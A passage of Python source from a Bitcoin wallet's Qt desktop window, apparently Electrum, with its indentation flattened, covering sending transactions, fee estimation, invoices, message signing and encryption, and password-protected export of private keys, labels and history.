text += ' (' + self.format_amount(c+u+x).strip() + ' ' + self.base_unit() + ' ' +_("are frozen") + ')'
elif self.fee_e.isModified():
amt_color, fee_color = BLACK_FG, BLACK_FG
elif self.amount_e.isModified():
amt_color, fee_color = BLACK_FG, BLUE_FG
else:
amt_color, fee_color = BLUE_FG, BLUE_FG
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color)
self.fee_e.setStyleSheet(fee_color)
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
self.is_max = True
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
if not self.config.get('offline') and self.config.is_dynfee() and not self.config.has_fee_estimates():
self.statusBar().showMessage(_('Waiting for fee estimates...'))
return False
freeze_fee = (self.fee_e.isModified()
and (self.fee_e.text() or self.fee_e.hasFocus()))
amount = '!' if self.is_max else self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
else:
fee = self.fee_e.get_amount() if freeze_fee else None
outputs = self.payto_e.get_outputs(self.is_max)
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [(_type, addr, amount)]
try:
tx = self.wallet.make_unsigned_transaction(self.get_coins(), outputs, self.config, fee)
self.not_enough_funds = False
except NotEnoughFunds:
self.not_enough_funds = True
if not freeze_fee:
self.fee_e.setAmount(None)
return
except BaseException:
return
if not freeze_fee:
fee = None if self.not_enough_funds else tx.get_fee()
self.fee_e.setAmount(fee)
if self.is_max:
amount = tx.output_value()
self.amount_e.setAmount(amount)
if fee is None:
return
rbf_policy = self.config.get('rbf_policy', 1)
if rbf_policy == 0:
b = True
elif rbf_policy == 1:
fee_rate = fee * 1000 / tx.estimated_size()
try:
c = self.config.reverse_dynfee(fee_rate)
b = c in [-1, 25]
except:
b = False
elif rbf_policy == 2:
b = False
self.rbf_checkbox.setVisible(b)
self.rbf_checkbox.setChecked(b)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address')
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_password():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
def read_send_tab(self):
if self.payment_request and self.payment_request.has_expired():
self.show_error(_('Payment request has expired'))
return
label = self.message_e.text()
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return
outputs = self.payto_e.get_outputs(self.is_max)
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "%s" could not be validated via an additional security check, DNSSEC, and thus may not be correct.'%alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return
if not outputs:
self.show_error(_('No outputs'))
return
for _type, addr, amount in outputs:
if addr is None:
self.show_error(_('Bitcoin Address is None'))
return
if _type == TYPE_ADDRESS and not bitcoin.is_address(addr):
self.show_error(_('Invalid Bitcoin Address'))
return
if amount is None:
self.show_error(_('Invalid Amount'))
return
freeze_fee = self.fee_e.isVisible() and self.fee_e.isModified() and (self.fee_e.text() or self.fee_e.hasFocus())
fee = self.fee_e.get_amount() if freeze_fee else None
coins = self.get_coins()
return outputs, fee, label, coins
def do_preview(self):
self.do_send(preview = True)
def do_send(self, preview = False):
if run_hook('abort_send', self):
return
r = self.read_send_tab()
if not r:
return
outputs, fee, tx_desc, coins = r
try:
tx = self.wallet.make_unsigned_transaction(coins, outputs, self.config, fee)
except NotEnoughFunds:
self.show_message(_("Insufficient funds"))
return
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
amount = tx.output_value() if self.is_max else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
use_rbf = self.rbf_checkbox.isChecked()
if use_rbf:
tx.set_rbf(True)
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000 and tx.requires_fee(self.wallet):
self.show_error(_("This transaction requires a higher fee, or it will not be propagated by the network"))
return
if preview:
self.show_transaction(tx, tx_desc)
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
confirm_rate = 2 * self.config.max_fee_rate()
if fee > confirm_rate * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_password():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
# call hook to see if plugin needs gui interaction
run_hook('sign_tx', self, tx)
def on_signed(result):
callback(True)
def on_failed(exc_info):
self.on_error(exc_info)
callback(False)
task = partial(self.wallet.sign_transaction, tx, password)
WaitingDialog(self, _('Signing transaction...'), task,
on_signed, on_failed)
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status, msg = self.network.broadcast(tx)
if pr and status is True:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
refund_address = self.wallet.get_receiving_addresses()[0]
ack_status, ack_msg = pr.send_ack(str(tx), refund_address)
if ack_status:
msg = ack_msg
return status, msg
# Capture current TL window; override might be removed on return
parent = self.top_level_window()
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.amount_e, self.message_e]:
e.setFrozen(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
self.show_message(self.payment_request.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.emit(SIGNAL('payment_request_ok'))
else:
self.emit(SIGNAL('payment_request_error'))
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except BaseException as e:
self.show_error(_('Invalid bitcoin URI:') + '\n' + str(e))
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.is_max = False
self.not_enough_funds = False
self.payment_request = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e, self.fee_e]:
e.setText('')
e.setFrozen(False)
self.set_pay_from([])
self.rbf_checkbox.setChecked(False)
self.update_status()
run_hook('do_clear', self)
def set_frozen_state(self, addrs, freeze):
self.wallet.set_frozen_state(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setMargin(0)
vbox.setSpacing(0)
vbox.addWidget(l)
buttons = QWidget()
vbox.addWidget(buttons)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
return self.create_list_tab(l)
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove")+" %s "%addr +_("from your wallet?")):
self.wallet.delete_address(addr)
self.address_list.update()
self.history_list.update()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove %s from your list of contacts?")
% " + ".join(labels)):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_invoice(self, key):
pr = self.invoices.get(key)
pr.verify(self.contacts)
self.show_pr_details(pr)
def show_pr_details(self, pr):
key = pr.get_id()
d = WindowModalDialog(self, _("Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Requestor") + ':'), 0, 0)
grid.addWidget(QLabel(pr.get_requestor()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2])+ self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
fn = self.getOpenFileName(_("Save invoice to file"), "*.bip70")
if not fn:
return
with open(fn, 'w') as f:
data = f.write(pr.raw)
self.show_message(_('Invoice saved as' + ' ' + fn))
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.invoices.remove(key)
self.history_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def do_pay_invoice(self, key):
pr = self.invoices.get(key)
self.payment_request = pr
self.prepare_for_payment_request()
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.config.get("console-history",[])
console.history_index = len(console.history)
console.updateNamespace({'wallet' : self.wallet,
'network' : self.network,
'plugins' : self.gui_object.plugins,
'window': self})
console.updateNamespace({'util' : util, 'bitcoin':bitcoin})
c = commands.Commands(self.config, self.wallet, self.network, lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args: f(method, args, self.password_dialog)
for m in dir(c):
if m[0]=='_' or m in ['network','wallet']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
qtVersion = qVersion()
self.balance_label = QLabel("")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.lock_icon = QIcon()
self.password_button = StatusBarButton(self.lock_icon, _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(QIcon(":icons/preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(QIcon(":icons/seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(QIcon(":icons/status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = QIcon(":icons/lock.png") if self.wallet.has_password() else QIcon(":icons/unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.can_change_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from .password_dialog import ChangePasswordDialog
d = ChangePasswordDialog(self, self.wallet)
ok, password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(password, new_password, encrypt_file)
except BaseException as e:
self.show_error(str(e))
return
except:
traceback.print_exc(file=sys.stdout)
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if new_password else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(280)
line2 = QLineEdit()
line2.setFixedWidth(280)
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
dialog = WindowModalDialog(self, "Master Public Keys")
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(100)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + ' ' + str(key+1)
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(str(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk_list = self.wallet.get_private_key(address, password)
except Exception as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 200)
vbox = QVBoxLayout()
vbox.addWidget( QLabel(_("Address") + ': ' + address))
vbox.addWidget( QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text='\n'.join(pk_list))
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = ("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.")
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message('Invalid Bitcoin address.')
return
if not bitcoin.is_p2pkh(address):
self.show_message('Cannot sign messages with this type of address.' + '\n\n' + self.msg_sign)
return
if not self.wallet.is_mine(address):
self.show_message('Address not in wallet.')
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
signature.setText(base64.b64encode(sig).decode('ascii'))
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf8')
if not bitcoin.is_address(address):
self.show_message('Invalid Bitcoin address.')
return
if not bitcoin.is_p2pkh(address):
self.show_message('Cannot verify messages with this type of address.' + '\n\n' + self.msg_sign)
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = bitcoin.verify_message(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(410, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
self.wallet.thread.add(task, on_success=lambda text: message_e.setText(text.decode('utf8')))
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf8')
try:
encrypted = bitcoin.encrypt_message(message, pubkey_e.text())
encrypted_e.setText(encrypted.decode('ascii'))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_warning(str(e))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt):
from electrum.transaction import tx_from_str, Transaction
try:
tx = tx_from_str(txt)
return Transaction(tx)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + str(e))
return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(str(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if data.startswith("bitcoin:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
# transactions are binary, but qrcode seems to return utf8...
data = data.decode('utf8')
z = bitcoin.base_decode(data, length=None, base=43)
data = bh2u(''.join(chr(ord(b)) for b in z))
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
r = self.network.synchronous_get(('blockchain.transaction.get',[txid]))
except BaseException as e:
self.show_message(str(e))
return
tx = transaction.Transaction(r)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(850, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done:
break
private_keys[addr] = "\n".join(self.wallet.get_private_key(addr, password))
d.emit(SIGNAL('computing_privkeys'))
d.emit(SIGNAL('show_privkeys'))
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
d.connect(d, QtCore.SIGNAL('computing_privkeys'), lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
d.connect(d, QtCore.SIGNAL('show_privkeys'), show_privkeys)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
import json
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
labelsFile = self.getOpenFileName(_("Open labels file"), "*.json")
if not labelsFile: return
try:
f = open(labelsFile, 'r')
data = f.read()
f.close()
for key, value in json.loads(data).items():
self.wallet.set_label(key, value)
self.show_message(_("Your labels were imported from") + " '%s'" % str(labelsFile))
except (IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to import your labels.") + "\n" + str(reason))
self.address_list.update()
self.history_list.update()
def do_export_labels(self):
labels = self.wallet.labels
try:
fileName = self.getSaveFileName(_("Select file to save your labels"), 'electrum_labels.json', "*.json")
if fileName:
with open(fileName, 'w+') as f:
json.dump(labels, f, indent=4, sort_keys=True)
self.show_message(_("Your labels were exported to") + " '%s'" % str(fileName))
except (IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to export your labels.") + "\n" + str(reason))
def export_history_dialog(self):
d = WindowModalDialog(self, _('Export History'))
d.setMinimumSize(400, 200)
vbox = QVBoxLayout(d)
defaultname = os.path.expanduser('~/electrum-history.csv')
select_msg = _('Select file to export your wallet transactions to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
vbox.addStretch(1)
hbox = Buttons(CancelButton(d), OkButton(d, _('Export')))
vbox.addLayout(hbox)
run_hook('export_history_dialog', self, hbox)
self.update()
if not d.exec_():
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_history(self.wallet, filename, csv_button.isChecked())
except (IOError, os.error) as reason:
export_error_label = _("Electrum was unable to produce a transaction export.")
self.show_critical(export_error_label + "\n" + str(reason), title=_("Unable to export history"))
return
self.show_message(_("Your wallet history has been successfully exported."))
def plot_history_dialog(self):
if plot_history is None:
return
wallet = self.wallet
history = wallet.get_history()
if len(history) > 0:
plt = plot_history(self.wallet, history)
plt.show()
def do_export_history(self, wallet, fileName, is_csv):
history = wallet.get_history()
lines = []
for item in history:
tx_hash, height, confirmations, timestamp, value, balance = item
if height>0:
if timestamp is not None:
time_string = format_time(timestamp)
else:
time_string = _("unverified")
else:
time_string = _("unconfirmed")
if value is not None:
value_string = format_satoshis(value, True)
else:
value_string = '--'
if tx_hash:
label = wallet.get_label(tx_hash)
label = label.encode('utf-8')
else:
label = ""
if is_csv:
lines.append([tx_hash, label, confirmations, value_string, time_string])
else:
lines.append({'txid':tx_hash, 'date':"%16s"%time_string, 'label':label, 'value':value_string})
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f, lineterminator='\n')
transaction.writerow(["transaction_hash","label", "confirmations", "value", "timestamp"])
